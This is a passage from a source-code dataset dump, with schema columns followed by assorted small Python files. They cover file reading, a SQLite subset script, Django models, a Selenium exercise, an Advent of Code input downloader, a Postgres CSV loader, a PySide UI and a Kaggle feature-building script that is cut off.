blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2b7caf37f30825099c1f1f2a7a8bd1b45c4da7b0 | f4fae74a825f0eb9b56a953eb775e56075f91deb | /LeyendoArchivos.py | 63c44df7b323b408e83ba93c91f93cfbfe2cc2af | [] | no_license | danielmserna/U.-Austral.-Estructuras-de-datos-en-Python | 2b66bedc41dd9424cfcc0469598d9700780b154d | d6000ea88e204c0bb12b3f349bf72457a66878c0 | refs/heads/main | 2023-01-14T00:13:03.851522 | 2020-11-05T14:42:09 | 2020-11-05T14:42:09 | 310,319,126 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 585 | py | with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
print(a_file.read())
with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
print(a_file.readline())
with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
print(a_file.readlines())
with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
print(list(a_file))
with open('c:/Users/Natalia/Desktop/CourseraPython/2/archivo.txt','r') as a_file:
for line in a_file:
a_file.read()
| [
"[email protected]"
] | |
ab1ff40b720f6d74fe8a729bd1cf8e28e0eb4b96 | 4603d5e087b8100b554caaa7fdbbdd5add32532e | /scripts/subset_db.py | af8f23648fb05ae1896e6c146c82aaeb0b4f758d | [] | no_license | sayan3710/summary_annotation | 4fd3f7b90c4b66942fbe95bb58d77987f5b0a1eb | 59961d959087a83e7ed9e2c60a7b089bcae87c63 | refs/heads/master | 2022-11-18T09:32:18.644364 | 2020-07-21T06:48:41 | 2020-07-21T06:48:41 | 281,316,276 | 0 | 0 | null | 2020-07-21T06:37:28 | 2020-07-21T06:37:28 | null | UTF-8 | Python | false | false | 2,756 | py |
import random
import json
import pandas as pd
import sqlite3
# THIS database will be modified; in practice,
# you'll want to copy the original populated db then
# run this script.
db_path = "../data/summaries_subset.db"
def connect_to_db():
conn = sqlite3.connect(db_path)
c = conn.cursor()
return conn, c
def remove_all_except(cochrane_ids):
conn, c = connect_to_db()
# drop from generated_summaries and target_summaries
# tables where the associated Cochrane ID is not
# in the list
query = "DELETE FROM generated_summaries WHERE cochrane_id NOT IN ({})".format(", ".join("?" * len(cochrane_ids)))
c.execute(query, cochrane_ids)
# now also drop the references
query = "DELETE FROM target_summaries WHERE cochrane_id NOT IN ({})".format(", ".join("?" * len(cochrane_ids)))
c.execute(query, cochrane_ids)
conn.commit()
conn.close()
def random_sample_cochrane_ids(n, dont_pick=None):
if dont_pick is None:
dont_pick = []
conn, c = connect_to_db()
excluded_cochrane_ids = []
query = "SELECT cochrane_id FROM target_summaries"
all_cochrane_ids = [c_id[0] for c_id in c.execute(query).fetchall()]
cochrane_ids_with_all_outputs = []
# exclude cases where we do not have an output for all systems;
# this can happen specifically for variants that use RoB prioritization
# because the model may not have returned a score for these, in which
# case, the system deemed them to be not RCTs.
# UPDATE this has been resolved, but we still use this to drop
# studies we wish to explicitly not consider (e.g., that have already
# been annotated)
expected_n_systems = 5
for c_id in all_cochrane_ids:
q = "SELECT DISTINCT system_id FROM generated_summaries WHERE cochrane_id=?"
systems = c.execute(q, (c_id,)).fetchall()
n_unique_systems = len(systems)
if (n_unique_systems == expected_n_systems) and (c_id not in dont_pick):
cochrane_ids_with_all_outputs.append(c_id)
else:
excluded_cochrane_ids.append(c_id)
n_excluded = len(set(excluded_cochrane_ids))
print("excluded {} reviews!".format(n_excluded))
return random.sample(cochrane_ids_with_all_outputs, n)
def make_pilot():
iain_already_labeled = ['CD000036', 'CD000020', 'CD000025', 'CD000052', 'CD000019', 'CD000088']
# now add a random set; here we do 18 reviews, which would yield 90 labels to do beyond
# the 30 for the above (5 systems per) -- totalling 120 labels todo.
random_set = random_sample_cochrane_ids(18, dont_pick=iain_already_labeled)
to_keep = iain_already_labeled + random_set
# TMP
remove_all_except(to_keep)
make_pilot()
| [
"[email protected]"
] | |
a7f870fac2e9bd47975cd69ece03201e255a3a5b | c55be023d5941141f4346228691f786e1042eddd | /goods/migrations/0013_auto_20161207_1937.py | 6c165c68ab6146f8bc838c24431c6cfabe54f454 | [] | no_license | SantiagoYoung/new_adw | cd426c3cbcfc412cad9478c041ffdf9a61777968 | 4dafba5979c49b8b28042c381b4e9b8e3771125d | refs/heads/master | 2021-01-20T07:36:27.271345 | 2017-05-02T09:55:12 | 2017-05-02T09:55:12 | 90,017,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,787 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.utils.timezone import utc
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('goods', '0012_auto_20161207_1622'),
]
operations = [
migrations.AddField(
model_name='goods',
name='collecters',
field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, null=True, verbose_name='\u6536\u85cf\u8005', blank=True),
),
migrations.AlterField(
model_name='bigtype',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 519492, tzinfo=utc)),
),
migrations.AlterField(
model_name='carouselfigure',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 518564, tzinfo=utc)),
),
migrations.AlterField(
model_name='goods',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 521671, tzinfo=utc), verbose_name='\u53d1\u5e03\u65f6\u95f4'),
),
migrations.AlterField(
model_name='goodscollection',
name='collected_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 523998, tzinfo=utc)),
),
migrations.AlterField(
model_name='smalltype',
name='create_time',
field=models.DateTimeField(default=datetime.datetime(2016, 12, 7, 11, 37, 5, 520349, tzinfo=utc)),
),
]
| [
"[email protected]"
] | |
39b74b1e402c37a563bc2ad9ab53e5dc02a696c4 | 419a0025e17904486aab7a642b6480123e76b367 | /stalk/models/__init__.py | 4c8161b5f8efcab4dd625dfa301bb8f07c6a7fa2 | [] | no_license | wagaman/dollop | 4b3e4016f3f62aba21093b0345fb3e611a96733e | b8c8e98958359a5d99e7d097aa6c36114fab28e3 | refs/heads/master | 2020-03-22T01:08:05.905580 | 2017-08-03T08:56:03 | 2017-08-03T08:56:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py | import p2peye
import product
import lingyi
import xinhua
import rong360
import xianjindai
import dailuopan
import baoxian
import nifa
__all__ = ['nifa', 'dailuopan', 'xianjindai', 'rong360', 'p2peye', 'product', 'lingyi', 'xinhua']
| [
"[email protected]"
] | |
870c73c7f33c0d63dc0eaa504790394ac4caba1a | ab6996c3a3117cb64ba2805b1fd9cb0756f8ecbd | /PP4E/Preview/update_db_shelve.py | 74815c70e795c8b42a4b25424e8d0aca4f7fa1f5 | [] | no_license | LingFangYuan/Learning | ea8742e8f340ea337185d4b8c07bfe3b73fcfde8 | e71a3b38dca36de5427869b11341302deb6c55dd | refs/heads/master | 2021-06-30T16:46:22.424896 | 2020-10-19T01:13:40 | 2020-10-19T01:13:40 | 183,213,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 174 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import shelve
db = shelve.open('people-shelve')
sue = db['sue']
sue['pay'] *= 1.5
db['sue'] = sue
db['ling'] = {}
db.close()
| [
"[email protected]"
] | |
f7d65e6fc6ca47d8a56c039426bd3d9c9df6c6ba | b7e60a0a1341a8c91e6690e49c0d37ac34b20693 | /empresas/serializers.py | 2eceed72a3bc22b180812a7ec8b5152a58bc3254 | [] | no_license | staylomak/AzurianTrack | b25fa052f26491057f6da1680402cab1ab3cd02b | 6feb6c7a3913cdcc7afc9e04b3321ec7e62453ea | refs/heads/master | 2020-05-02T10:18:46.666003 | 2019-03-27T01:24:27 | 2019-03-27T01:24:27 | 177,893,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | # -*- coding: utf-8 -*-
from rest_framework.serializers import ModelSerializer
from .models import CamposOpcionalesEmail, Empresa, Holding
class HoldingSerializer(ModelSerializer):
class Meta:
model = Holding
fields = ('nombre',)
class EmpresaSerializer(ModelSerializer):
holding = HoldingSerializer(many=False, read_only=True)
class Meta:
model = Empresa
fields = ('rut', 'empresa', 'holding')
class CamposOpcionalesEmailSerializer(ModelSerializer):
class Meta:
model = CamposOpcionalesEmail
fields = ('empresa', 'opcional1', 'opcional2', 'opcional3',)
| [
"[email protected]"
] | |
15b38a03fb4b38b9c3bda63281accb435b88179c | d328169faa502930d16f1a9c476dcfba0f7f02b4 | /ex5.py | 765a98ade1d66ce144d9de689f711f997206cfa0 | [] | no_license | Siilbon/pythonthehardway | 39898126da84c0f0b9354b455195d3490dd42be5 | 9d150f9925e17e17e28f0b5d238627ba6a484d6a | refs/heads/master | 2021-09-07T15:05:05.395669 | 2018-02-24T15:23:15 | 2018-02-24T15:23:15 | 106,835,787 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 612 | py | name = "Karl Siil"
age = 23 # As of 5/15/2015
height = 71.0 # inches
weight = 215.0 #lbs
eyes = 'Brown'
teeth = 'white'
hair = 'Brown'
print "Let's talk about %s" % name
print "He's %r cm tall." % (height*2.54) #inches to cm
print "He's %d years old" % age
print "He's %r Kg heavy." % (weight*2.2) #lbs to kg
print "Actually that's not too heavy."
print "He's got %s eyes and %s hair." % (eyes, hair)
print "His teeth are usually %s depending on the coffee." % teeth
# this line is tricky, try to get it exactly right
print "if I add %d, %d, and %d I get %d." % ( age,
height, weight, age + height + weight)
| [
"[email protected]"
] | |
82caa68a12d070a69978a215ee61d9c3aa18053d | 31a76579ea3370f140fbebeb57dc47c17244bb11 | /lesson2_1_step6.py | dd1e6d54c0f238a79c8eb05cff6456be69d4c660 | [] | no_license | Homo-Deus/PythonSelenium | ad13fa2c24ee1ade13ba970c2634f6622e4c2885 | cd2fbc0054dda25923ebc132935e14587aec76c6 | refs/heads/master | 2020-09-30T01:44:32.413732 | 2019-12-11T08:31:15 | 2019-12-11T08:31:15 | 227,169,664 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 952 | py | from selenium import webdriver
import math
import time
def calc(x):
return str(math.log(abs(12*math.sin(int(x)))))
link = "http://suninjuly.github.io/get_attribute.html"
try:
browser = webdriver.Chrome()
browser.get(link)
x_element = browser.find_element_by_id("treasure")
x = x_element.get_attribute("valuex")
y = calc(x)
input_field = browser.find_element_by_css_selector("#answer")
input_field.send_keys(y)
checkbox = browser.find_element_by_css_selector("#robotCheckbox")
checkbox.click()
radioBtn = browser.find_element_by_css_selector("#robotsRule")
radioBtn.click()
submit = browser.find_element_by_xpath("//button[text()='Submit']")
submit.click()
finally:
# успеваем скопировать код за 30 секунд
time.sleep(5)
# закрываем браузер после всех манипуляций
browser.quit() | [
"[email protected]"
] | |
fe43abde2c1af9bfc5f37ae172948ea339cc62b2 | ef2353839816c680f4de3f47aed14df740785962 | /demo.py | 22bd11b2c8ba71f9b91a253c9d1ecfda89cb6da6 | [] | no_license | concpetosfundamentalesprogramacionaa19/practica220419-davisalex22 | 4ebee746451a2287c83f4c50c976f44838c0fada | 927aa0edfaac1c014a3e64bc30f546b678b90ad7 | refs/heads/master | 2020-05-16T06:53:47.965138 | 2019-04-22T21:48:28 | 2019-04-22T21:48:28 | 182,862,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | """
Ejemplo de lenguaje Python
autor: @davidsalazar
"""
import sys
variable = sys.argv[0]
dato1 = sys.argv[1]
dato2 = sys.argv[2]
dato3 = sys.argv[3]
# Mostrar resultados
print("variable argv [0]: %s" % variable)
print("variable argv [1]: %s" % dato1)
print("variable argv [2]: %s" % dato2)
print("variable argv [3]: %s" % dato3)
| [
"[email protected]"
] | |
764f1d7e0026b8f056deeb99fcf5c17182fb0eae | c2b9bebe226701539439ce15e00359690809a613 | /venv/bin/virtualenv | 96d2e4bfa218b7800c144b14089aa5d9b67bc95d | [] | no_license | arielbk/kalender-heroku | 15b6e09de1e7a2da5e110933867d8c8f750ebb93 | f276a99092be9af78d85224c0acfac6099c45a79 | refs/heads/master | 2022-12-12T22:47:41.084877 | 2018-05-24T20:45:17 | 2018-05-24T20:45:17 | 131,035,880 | 1 | 0 | null | 2022-12-08T00:59:23 | 2018-04-25T16:39:03 | Python | UTF-8 | Python | false | false | 256 | #!/Users/arielbk/Documents/Dev/kalender_post/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from virtualenv import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
ead9ed3ce662bd87d92fac6851265fbfb5796cd4 | ca097eb1cbb92786c2bd925ec2bf86c8123e9305 | /Week 6 Dynamic Programming Part 2/partitioning_souvenirs.py | 18fa19efd4425be99a752b3ab395ae12812a249c | [] | no_license | he-is-james/Algorithmic-Toolbox | 5ef655dd7e2f6b91f826bcf194c0debfbbb43c9e | 1f7c9b91082d96a22cb28dd097cace23722070cf | refs/heads/master | 2022-12-23T23:08:17.059041 | 2020-09-26T01:30:25 | 2020-09-26T01:30:25 | 290,607,701 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | import numpy
def eq_partitions(W, n, v_list):
if n < 3:
return 0
elif sum(v_list) % 3 != 0:
return 0
else:
count = 0
value = numpy.zeros((W+1, n+1))
for i in range(1, W+1):
for j in range(1, n+1):
value[i][j] = value[i][j-1]
if v_list[j-1] <= i:
t = value[i-v_list[j-1]][j-1] + v_list[j-1]
if t > value[i][j]:
value[i][j] = t
if value[i][j] == W:
count += 1
if count < 3:
return 0
else:
return 1
n = int(input())
v_list = list(map(int, input().split()))
W = sum(v_list)//3
print(eq_partitions(W, n, v_list)) | [
"[email protected]"
] | |
d565638f4fcdd31042919c750cae9513d15bb872 | 3e264d0f060184f1c8b6da0531a64ba800574c7d | /app.py | f4c229e3ec063c7cf604ea7f244aa3f179325f9d | [
"Apache-2.0"
] | permissive | gios91/max-ingress-parser | ccc5e67d924a2117e9f57e49ce708e6289e81836 | 1b7682d3821c9043cfbf4867563f64a1b057c16c | refs/heads/main | 2023-01-08T09:55:14.748045 | 2020-11-20T16:52:03 | 2020-11-20T16:52:03 | 314,611,065 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,420 | py | import sys
import json
import csv
INGRESS_URL = "https://intel.ingress.com/intel?ll={}&z=17&pll={}"
def main(input_file_path,output_file_path):
L_out = []
L_out.append("{};{};{};{}".format('portal','url','priority','category'))
f = open(input_file_path, 'r')
json_data = json.load(f)
for portals_id in json_data['portals']:
portal_category = json_data['portals'][portals_id]['label'].rstrip()
for portal_id in json_data['portals'][portals_id]['bkmrk']:
try:
portal_data = json_data['portals'][portals_id]['bkmrk'][portal_id]
row = "{};{};{};{}".format(portal_data['label'].rstrip(),INGRESS_URL.format(portal_data['latlng'].rstrip(),portal_data['latlng'].rstrip()),str(0),portal_category)
print(row)
L_out.append(row)
except UnicodeEncodeError as e:
print("WARNING: {}".format(e))
continue
print("# portals parsed: {}".format(str(len(L_out))))
_write_csv(output_file_path, L_out)
def _write_csv(output_file_path, L_out):
out_file = open(output_file_path, "w")
for line in L_out:
# write line to output file
out_file.write(line)
out_file.write("\n")
out_file.close()
if __name__ == '__main__':
input_file_path = sys.argv[1]
output_file_path = sys.argv[2]
main(input_file_path,output_file_path) | [
"[email protected]"
] | |
3894f61eafb3a91ce6cd4f3f3e254805de81d0d0 | b23d294fdffabe72c336644f119860f5ce704eef | /python_1000phone/语言基础-老师代码/day8-字符串/code/02-字符串和字符.py | 75a1fa306e187150928f8bf8c0d74e26891d4247 | [] | no_license | ikaros274556330/my_code | 65232758fd20820e9f4fa8cb5a6c91a1969862a2 | 92db21c4abcbd88b7bd77e78d9f660b4534b5071 | refs/heads/master | 2020-11-26T09:43:58.200990 | 2019-12-23T02:08:39 | 2019-12-23T02:08:39 | 229,032,315 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,997 | py | """__author__=余婷"""
# 1.什么是字符串(str)
"""
字符串是容器型数据类型, 将''/""/''''''/""""""作为容器标志,容器中的元素全是字符
不可变的(不支持增删改)、有序(支持下标操作)
"""
str1 = 'hello\n123'
str2 = "你好"
str3 = '''thanks
123
456'''
str4 = """谢谢"""
print(type(str1), type(str2), type(str3), type(str4))
print(str1)
print(str3)
print('============================================')
# 2.字符串中的元素 - 字符
"""
python中只有字符的概念,没有对应的数据类型。引号中只有一个元素的字符串可以看成一个字符
字符串又叫字符集
1)字符串中的字符 - 原则上任何可以通过键盘输入或者从其他地方赋值粘贴的所有的符号都可以作为字符
'和健身房'、'shuASSS'、'2378'、'+-===!@&*#@'、'♠'
a.普通字符: 在字符串中能够代表符号本身的字符(没有特殊意义和特殊功能的符号)
b.转义字符: 在字符串中有特殊意义和特殊功能的符号的组合,一般是以\开头的
\n - 换行
\' - 表示'本身
\" - 表示"本身
\t - 表示一个缩进(tab键)
\\ - 表示一个\
注意: 所有的转义字符的长度都是1
c.编码字符
2)阻止转义: 在字符串的最前面加r/R可以让当前字符串中所有的转义字符失效(所有的符号在字符串中都表示这个符号本身)
"""
# \u四位的16进制数 - 编码字符(获取4位16进制数作为编码值对应的字符)
str1 = 'abc\n123'
print(str1)
str2 = 'abc\'1\"23'
print(str2)
str3 = '\tabc'
print(str3)
str4 = 'abc\\n123'
print(str4)
str5 = 'abc\u4eff'
print(str5)
str6 = R'\tabc\n\'123'
print(str6)
# 3.字符编码
"""
计算机不能直接存储字符(符号),只能存储数字;
为了能够存储字符,把每一个字符关联了一个固定的数字(这个固定的数字就是对应的字符的编码)
字符和数字和一一对应关系就是编码表:ASCII码表,Unicode编码表(python)
1) ASCII码表 - 在计算机中采用一个字节保存一个字符(总共128个字符), 字符包含了所有的字母、数字和美国常用符号
0 ~ 9: 编码值从48开始依次增加
大写字母的编码值 < 小写字母的编码值
大写字母和小写字母不是紧挨着的
2) Unicode编码表是ASCII码表的扩展, 包含了世界上所有的国家、所有的语言对应的符号(总共有65536个符号)
ASCII码: 0 ~ 127
中文编码值范围: 0x4e00 ~ 0x9fa5
"""
# 1.编码字符: \u4位16进制编码值
str1 = 'abc\u50ff'
print(str1)
# 2.chr(编码值) - 获取编码值对应的字符
print(chr(97))
num = 0
for x in range(0x4e00, 0x9fa5+1):
print(chr(x), end=' ')
num += 1
if num % 30 == 0:
print()
print()
for x in range(0x0F00, 0x0FFF+1):
print(chr(x), end=' ')
print()
for x in range(0x2400, 0x243F+1):
print(chr(x), end=' ')
print()
# 3.ord(字符) - 获取指定字符对应的编码值
print(hex(ord('余')))
print(hex(ord('婷')))
| [
"[email protected]"
] | |
6a4b599a205b1ec386d7c58c45240aa57ea5de87 | b9fb2d6aa7506845dcdac833c6cfb82feede3a07 | /AdventOfCode/2021/download.py | d006f37e98d851603f2611452f98b391b939e86d | [
"Unlicense"
] | permissive | wandyezj/scripts | a28e4a8bc30d6fa78d0af6db5c905cc4b7a0c714 | 871438873ec79435e5e3e5d576c18045c0907b18 | refs/heads/master | 2023-02-18T10:25:04.542276 | 2022-12-06T06:01:09 | 2022-12-06T06:01:09 | 182,362,358 | 0 | 0 | Unlicense | 2023-02-09T04:36:45 | 2019-04-20T05:02:50 | Python | UTF-8 | Python | false | false | 929 | py | import urllib.request
def download_data(year, day, session):
url = r'''https://adventofcode.com/{}/day/{}/input'''.format(year, day)
print(url)
opener = urllib.request.build_opener()
opener.addheaders = [('cookie', 'session={}'.format(session))]
response = opener.open(url)
#print(response)
data = response.read().decode('utf-8')
#print(data)
return data
def write_file(file, data):
f = open(file, 'w')
f.write(data)
f.close()
import sys
def run():
name, year, day, session = sys.argv
if (year == None or day == None or session== None):
print("usage: year day session")
return
print('''
year: {}
day: {}
session: {}
'''.format(year, day, session))
data = download_data(year, str(int(day)), session)
file = "{}.data.txt".format(str(int(day)).zfill(2))
print()
print(file)
write_file(file, data)
run()
| [
"[email protected]"
] | |
a1e50554334dad6f32cf1d7d7d78bc7436fad158 | 68ed4984d29a49f28053b47ce112e46c6c71c812 | /population/population/serializers.py | 19c252b9c7c71426559c5e5cdf6fe70ff86d4d04 | [
"BSD-3-Clause"
] | permissive | Zachary-Jackson/Population-Statistical-Visualization | f3c5feac0b50a2d16bdbe9d28d891f9720a88048 | 6d29119e8f7d181786293b6bd3f0c1900a1fa6b7 | refs/heads/master | 2020-04-05T02:03:08.857800 | 2018-12-17T20:41:13 | 2018-12-17T20:41:13 | 156,461,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | from rest_framework import serializers
from .models import Location
class LocationSerializer(serializers.ModelSerializer):
"""Serializer for a Location object showing all fields"""
class Meta:
model = Location
fields = '__all__'
| [
"[email protected]"
] | |
3c63ca93c357aeefbd628cfc7ab30f7287c82135 | 7e7a16fc6bc7359d4633e01b19dd8803b756303d | /hw_2/load_data_fast.py | ee29709e16c8d5edfda03a06c9383f2200758364 | [] | no_license | Anthony1128/Hw_data_engine | 345d1aa2a7969afae91084fae7e741187139a854 | 68c05828ddbd0ba594f4a4720c58c32d7517a1bc | refs/heads/main | 2023-03-09T11:39:16.232717 | 2021-02-01T23:03:51 | 2021-02-01T23:03:51 | 301,472,555 | 0 | 0 | null | 2021-01-06T23:30:06 | 2020-10-05T16:31:05 | Python | UTF-8 | Python | false | false | 1,739 | py | import os
import psycopg2
import csv
import time
start_time = time.time()
# creating dialect to proper csv reading
csv.register_dialect('mydialect', delimiter=',', quoting=csv.QUOTE_ALL, doublequote=True)
# DB parameters
os.environ['HOST'] = 'localhost'
os.environ['DB_NAME'] = 'postgres'
os.environ['DB_USER'] = 'postgres'
HOST = os.environ.get('HOST')
DB_NAME = os.environ.get('DB_NAME')
USER = os.environ.get('DB_USER')
# preparing sql query CREATE TABLE from csv file
def create_tab(csv_file='P9-ConsumerComplaints.csv'):
with open(csv_file, 'r') as file:
reader = csv.reader(file, dialect='mydialect')
first_line = next(reader)
# create_table = 'CREATE TABLE ConsumerComplaints (id SERIAL PRIMARY KEY,'
create_table = 'CREATE TABLE ConsumerComplaints ('
for id_c, column in enumerate(first_line):
if id_c == len(first_line) - 1:
# create_table += f'"{column}" int);'
create_table += f'"{column}" int PRIMARY KEY);'
elif id_c == 0:
create_table += f'"{column}" date, '
else:
create_table += f'"{column}" text, '
return create_table
def main():
# connecting to db
conn = psycopg2.connect(host=HOST, dbname=DB_NAME, user=USER)
cur = conn.cursor()
# executing query to create table and load data in it
cur.execute(create_tab())
query = '''
COPY consumercomplaints FROM stdin WITH CSV HEADER
DELIMITER as ','
'''
with open('P9-ConsumerComplaints.csv', 'r') as file:
cur.copy_expert(sql=query, file=file)
conn.commit()
cur.close()
conn.close()
if __name__ == '__main__':
main()
print(f'time of performance: {time.time() - start_time} seconds')
| [
"[email protected]"
] | |
24115c94d48eee633cd07f1eee258476798db279 | 252974316cf3b44afa550ea202abe67b474d698e | /recipies/python/paulwinex/projectManager/widgets/createProject_UIs.py | 7aeaf44be5239a954c7f3053b5013c38bbd22249 | [] | no_license | igor-si/shared | 22892dc1c93d97591495ed48dbeecd741bdd6dfd | 45301c31814e87a6e5a28d857e9b2ef6421b5c16 | refs/heads/master | 2020-07-17T12:35:33.425496 | 2019-12-17T08:36:48 | 2019-12-17T08:36:48 | 206,020,718 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,934 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'G:\projects\pyqt\week2\projectManager\widgets\createProject.ui'
#
# Created: Thu Oct 09 13:31:14 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_createDialog(object):
def setupUi(self, createDialog):
createDialog.setObjectName("createDialog")
createDialog.resize(240, 219)
self.verticalLayout = QtGui.QVBoxLayout(createDialog)
self.verticalLayout.setObjectName("verticalLayout")
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.label = QtGui.QLabel(createDialog)
self.label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1)
self.name_lb = QtGui.QLineEdit(createDialog)
self.name_lb.setObjectName("name_lb")
self.gridLayout.addWidget(self.name_lb, 0, 1, 1, 1)
self.label_2 = QtGui.QLabel(createDialog)
self.label_2.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTop|QtCore.Qt.AlignTrailing)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1)
self.comment_te = QtGui.QPlainTextEdit(createDialog)
self.comment_te.setObjectName("comment_te")
self.gridLayout.addWidget(self.comment_te, 1, 1, 1, 1)
self.verticalLayout.addLayout(self.gridLayout)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.create_btn = QtGui.QPushButton(createDialog)
self.create_btn.setObjectName("create_btn")
self.horizontalLayout.addWidget(self.create_btn)
self.cancel_btn = QtGui.QPushButton(createDialog)
self.cancel_btn.setObjectName("cancel_btn")
self.horizontalLayout.addWidget(self.cancel_btn)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(createDialog)
QtCore.QMetaObject.connectSlotsByName(createDialog)
def retranslateUi(self, createDialog):
createDialog.setWindowTitle(QtGui.QApplication.translate("createDialog", "Dialog", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("createDialog", "Name", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("createDialog", "Comment", None, QtGui.QApplication.UnicodeUTF8))
self.create_btn.setText(QtGui.QApplication.translate("createDialog", "Create", None, QtGui.QApplication.UnicodeUTF8))
self.cancel_btn.setText(QtGui.QApplication.translate("createDialog", "Cancel", None, QtGui.QApplication.UnicodeUTF8))
| [
"[email protected]"
] | |
4e9fe89de9f027a5523df7711cf3bf7afe7f2fd8 | 48ac73068d4b9f54eedeca1bf91711c3d5d1ab46 | /src/make_features/85_transformer_seq3.py | 1c55da4f21b50eb5b8ebd93c85fdcd41adcf3c53 | [] | no_license | Naoki1101/kaggle-riiid | ae260d8e75c54c2ac9d8f4a5b1a39eaed7e5319a | 223148098bfe93d5c1812ef1f94c40989ee52642 | refs/heads/main | 2023-02-23T12:15:41.768719 | 2021-01-25T00:37:21 | 2021-01-25T00:37:21 | 318,398,912 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,729 | py | import sys
import numpy as np
import pandas as pd
from tqdm import tqdm
from pathlib import Path
sys.path.append('../src')
import const
from utils import DataHandler
dh = DataHandler()
MAX_SEQ = 101
usecols = ['row_id', 'user_id', 'content_id', 'timestamp', 'prior_question_elapsed_time', 'part', 'answered_correctly', 'is_val']
def add_user_feats(df, user_content_dict, user_timestamp_dict, user_prior_elapsed_dict,
user_part_dict, user_target_dict):
for idx, row in enumerate(tqdm(df[usecols].values)):
row_id = row[0]
user_id = row[1]
content_id = row[2]
timestamp = row[3]
prior_elapsed = row[4]
part = row[5]
target = row[6]
val_flg = row[7]
update_dict(user_id, user_content_dict, content_id)
update_dict(user_id, user_timestamp_dict, timestamp)
update_dict(user_id, user_prior_elapsed_dict, prior_elapsed)
update_dict(user_id, user_part_dict, part)
update_dict(user_id, user_target_dict, target)
if val_flg:
seq_list = [
user_content_dict[user_id][1:],
np.diff(user_timestamp_dict[user_id]),
user_prior_elapsed_dict[user_id][1:],
user_part_dict[user_id][1:],
user_target_dict[user_id][:-1],
]
save_seq(row_id, seq_list)
def get_features(df):
user_content_dict = {}
user_timestamp_dict = {}
user_prior_elapsed_dict = {}
user_part_dict = {}
user_target_dict = {}
add_user_feats(df, user_content_dict, user_timestamp_dict, user_prior_elapsed_dict,
user_part_dict, user_target_dict)
def update_dict(user_id, user_dict, v):
default_list = np.zeros(MAX_SEQ)
if user_id not in user_dict:
user_dict[user_id] = default_list.copy()
new_list = list(user_dict[user_id])
new_list.pop(0)
new_list.append(v)
user_dict[user_id] = np.array(new_list)
def save_seq(row_id, seq_list):
seq_dir = Path('../data/seq3')
if not seq_dir.exists():
seq_dir.mkdir(exist_ok=True)
dh.save(seq_dir / f'row_{int(row_id)}.pkl', seq_list)
def main():
train_df = pd.read_csv(const.INPUT_DATA_DIR / 'train.csv', dtype=const.DTYPE)
questions_df = pd.read_csv('../data/input/questions.csv')
q2p = dict(questions_df[['question_id', 'part']].values)
train_df['part'] = train_df['content_id'].map(q2p)
val_idx = np.load('../data/processed/cv1_valid.npy')
